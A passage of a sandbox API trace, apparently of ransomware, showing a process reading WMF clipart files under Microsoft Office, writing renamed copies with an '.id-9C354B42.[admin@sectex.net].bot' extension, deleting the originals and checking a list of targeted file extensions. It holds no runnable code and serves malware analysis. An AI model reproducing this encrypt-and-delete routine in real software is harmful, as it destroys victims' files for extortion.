	[0145.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.222] GetLastError () returned 0x0
	[0145.222] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x244, lpOverlapped=0x0) returned 1
	[0145.223] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x250, lpOverlapped=0x0) returned 1
	[0145.224] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.224] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.224] SetEndOfFile (hFile=0x38c) returned 1
	[0145.224] CloseHandle (hObject=0x38c) returned 1
	[0145.224] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.224] SetEndOfFile (hFile=0x3a4) returned 1
	[0145.226] CloseHandle (hObject=0x3a4) returned 1
	[0145.227] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.227] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf")) returned 1
	[0145.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.227] lstrlenW (lpString=".doc") returned 4
	[0145.228] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.228] lstrlenW (lpString=".docx") returned 5
	[0145.228] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.228] lstrlenW (lpString=".pdf") returned 4
	[0145.228] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.228] lstrlenW (lpString=".xls") returned 4
	[0145.228] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.228] lstrlenW (lpString=".xlsx") returned 5
	[0145.228] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.228] lstrlenW (lpString=".ppt") returned 4
	[0145.228] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.228] lstrlenW (lpString=".zip") returned 4
	[0145.228] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.228] lstrlenW (lpString=".rar") returned 4
	[0145.228] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.228] lstrlenW (lpString=".bz2") returned 4
	[0145.228] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.228] lstrlenW (lpString=".7z") returned 3
	[0145.228] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.228] lstrlenW (lpString=".dbf") returned 4
	[0145.228] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.228] lstrlenW (lpString=".1cd") returned 4
	[0145.228] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.228] lstrlenW (lpString=".jpg") returned 4
	[0145.228] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.228] lstrlenW (lpString=".doc") returned 4
	[0145.229] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.229] lstrlenW (lpString=".docx") returned 5
	[0145.229] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.229] lstrlenW (lpString=".pdf") returned 4
	[0145.229] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.229] lstrlenW (lpString=".xls") returned 4
	[0145.229] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.229] lstrlenW (lpString=".xlsx") returned 5
	[0145.229] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.229] lstrlenW (lpString=".ppt") returned 4
	[0145.229] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.229] lstrlenW (lpString=".zip") returned 4
	[0145.229] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.229] lstrlenW (lpString=".rar") returned 4
	[0145.229] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.229] lstrlenW (lpString=".bz2") returned 4
	[0145.229] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.229] lstrlenW (lpString=".7z") returned 3
	[0145.229] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.229] lstrlenW (lpString=".dbf") returned 4
	[0145.229] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.229] lstrlenW (lpString=".1cd") returned 4
	[0145.229] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63
	[0145.229] lstrlenW (lpString=".jpg") returned 4
	[0145.229] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.230] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.230] lstrlenW (lpString="DD01630_.WMF") returned 12
	[0145.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.230] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=296) returned 1
	[0145.230] CloseHandle (hObject=0x3a4) returned 1
	[0145.230] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf")) returned 0x20
	[0145.230] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.231] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.231] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.231] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.233] GetLastError () returned 0x0
	[0145.233] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x128, lpOverlapped=0x0) returned 1
	[0145.234] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x130, lpOverlapped=0x0) returned 1
	[0145.235] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.235] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.237] SetEndOfFile (hFile=0x38c) returned 1
	[0145.237] CloseHandle (hObject=0x38c) returned 1
	[0145.237] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.237] SetEndOfFile (hFile=0x3a4) returned 1
	[0145.240] CloseHandle (hObject=0x3a4) returned 1
	[0145.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.240] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf")) returned 1
	[0145.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.241] lstrlenW (lpString=".doc") returned 4
	[0145.241] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.241] lstrlenW (lpString=".docx") returned 5
	[0145.241] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.241] lstrlenW (lpString=".pdf") returned 4
	[0145.241] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.241] lstrlenW (lpString=".xls") returned 4
	[0145.241] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.241] lstrlenW (lpString=".xlsx") returned 5
	[0145.241] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.241] lstrlenW (lpString=".ppt") returned 4
	[0145.241] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.241] lstrlenW (lpString=".zip") returned 4
	[0145.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.241] lstrlenW (lpString=".rar") returned 4
	[0145.241] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.241] lstrlenW (lpString=".bz2") returned 4
	[0145.241] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.241] lstrlenW (lpString=".7z") returned 3
	[0145.241] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.241] lstrlenW (lpString=".dbf") returned 4
	[0145.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.241] lstrlenW (lpString=".1cd") returned 4
	[0145.241] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.241] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.241] lstrlenW (lpString=".jpg") returned 4
	[0145.241] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.242] lstrlenW (lpString=".doc") returned 4
	[0145.242] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.242] lstrlenW (lpString=".docx") returned 5
	[0145.242] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.242] lstrlenW (lpString=".pdf") returned 4
	[0145.242] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.242] lstrlenW (lpString=".xls") returned 4
	[0145.242] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.242] lstrlenW (lpString=".xlsx") returned 5
	[0145.242] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.242] lstrlenW (lpString=".ppt") returned 4
	[0145.242] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.242] lstrlenW (lpString=".zip") returned 4
	[0145.242] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.242] lstrlenW (lpString=".rar") returned 4
	[0145.242] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.242] lstrlenW (lpString=".bz2") returned 4
	[0145.242] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.242] lstrlenW (lpString=".7z") returned 3
	[0145.242] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.242] lstrlenW (lpString=".dbf") returned 4
	[0145.242] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.242] lstrlenW (lpString=".1cd") returned 4
	[0145.242] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.242] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63
	[0145.242] lstrlenW (lpString=".jpg") returned 4
	[0145.242] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.243] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.243] lstrlenW (lpString="DD01631_.WMF") returned 12
	[0145.243] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.482] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=552) returned 1
	[0145.482] CloseHandle (hObject=0x3a4) returned 1
	[0145.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf")) returned 0x20
	[0145.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.755] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.755] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.755] GetLastError () returned 0x0
	[0145.755] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x228, lpOverlapped=0x0) returned 1
	[0145.756] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x230, lpOverlapped=0x0) returned 1
	[0145.762] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.762] WriteFile (in: hFile=0x3c0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.762] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.762] CloseHandle (hObject=0x3c0) returned 1
	[0145.762] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.762] SetEndOfFile (hFile=0x31c) returned 1
	[0145.764] CloseHandle (hObject=0x31c) returned 1
	[0145.764] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.765] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf")) returned 1
	[0145.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.765] lstrlenW (lpString=".doc") returned 4
	[0145.765] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.765] lstrlenW (lpString=".docx") returned 5
	[0145.765] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.765] lstrlenW (lpString=".pdf") returned 4
	[0145.765] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.765] lstrlenW (lpString=".xls") returned 4
	[0145.765] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.765] lstrlenW (lpString=".xlsx") returned 5
	[0145.765] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.765] lstrlenW (lpString=".ppt") returned 4
	[0145.765] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.765] lstrlenW (lpString=".zip") returned 4
	[0145.766] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.766] lstrlenW (lpString=".rar") returned 4
	[0145.766] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.766] lstrlenW (lpString=".bz2") returned 4
	[0145.766] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.766] lstrlenW (lpString=".7z") returned 3
	[0145.766] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.766] lstrlenW (lpString=".dbf") returned 4
	[0145.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.766] lstrlenW (lpString=".1cd") returned 4
	[0145.766] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.766] lstrlenW (lpString=".jpg") returned 4
	[0145.766] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.766] lstrlenW (lpString=".doc") returned 4
	[0145.766] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.766] lstrlenW (lpString=".docx") returned 5
	[0145.766] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.766] lstrlenW (lpString=".pdf") returned 4
	[0145.766] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.766] lstrlenW (lpString=".xls") returned 4
	[0145.766] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.766] lstrlenW (lpString=".xlsx") returned 5
	[0145.766] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.766] lstrlenW (lpString=".ppt") returned 4
	[0145.766] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.766] lstrlenW (lpString=".zip") returned 4
	[0145.766] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.767] lstrlenW (lpString=".rar") returned 4
	[0145.767] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.767] lstrlenW (lpString=".bz2") returned 4
	[0145.767] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.767] lstrlenW (lpString=".7z") returned 3
	[0145.767] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.767] lstrlenW (lpString=".dbf") returned 4
	[0145.767] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.767] lstrlenW (lpString=".1cd") returned 4
	[0145.767] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.767] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 63
	[0145.767] lstrlenW (lpString=".jpg") returned 4
	[0145.767] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.767] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.767] lstrlenW (lpString="FD00077_.WMF") returned 12
	[0145.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.790] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=30240) returned 1
	[0145.790] CloseHandle (hObject=0x31c) returned 1
	[0145.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf")) returned 0x20
	[0145.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00077_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00077_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.821] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.821] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
